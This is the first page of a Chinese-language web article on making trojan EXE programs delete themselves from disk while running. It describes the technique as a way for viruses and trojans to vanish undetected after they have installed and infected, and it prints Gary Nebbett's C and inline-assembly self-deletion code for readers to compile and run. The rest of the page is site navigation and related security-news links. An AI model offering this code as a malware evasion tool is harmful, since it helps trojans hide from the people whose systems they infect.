EXE类木马程序的自删除实现程序

程序的自删除已经不是什么新鲜的话题了，它广泛运用于木马、病毒中。试想想，当你的程序还在运行中（通常是完成了驻留、感染模块），它就自动地把自己从磁盘中删掉，这样一来，就做到了神不知鬼不觉，呵呵，是不是很cool呢？自删除（Self Deleting）最早的方法是由 Gary Nebbett 大虾写的，太经典了，不能不提。程序如下：#include "windows.h"int main（int argc, char *argv[]）{char buf[MAX_PATH];HMODULE module;module = GetModuleHandle（0）;GetModuleFileName（module, buf, MAX_PATH）;CloseHandle（（HANDLE）4）;__asm{lea eax, bufpush 0push 0push eaxpush ExitProcesspush modulepush DeleteFilepush UnmapViewOfFileret}return 0;}试试编译它，运行。怎么样？从你的眼皮底下消失了吧？是不是很神奇？

【内容导航】
第1页：EXE类木马程序的自删除实现程序	第2页：EXE类木马程序的自删除实现程序

Linux与Unix操作系统编程的安全特性Skype今日预警用户小心新蠕虫病毒W32.Pykspa.D相关资讯木马

木马的自我修炼：金融恶意程序f0xy （02/03/2015 09:24:18）
恶意软件趋势：跨平台恶意软件崛起（11/12/2012 12:04:05）
Zemra 木马源代码泄露（07/04/2012 07:37:03）

安全研究人员：更多木马将目标锁定（11/22/2012 09:29:20）
McAfee：90%成移动恶意程序锁定（09/07/2012 05:46:33）
Flame恶意软件被设计为可窃取图纸（06/06/2012 01:35:29）

本文评论查看全部评论（1）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论
参与本评论即表明您已经阅读并接受上述条款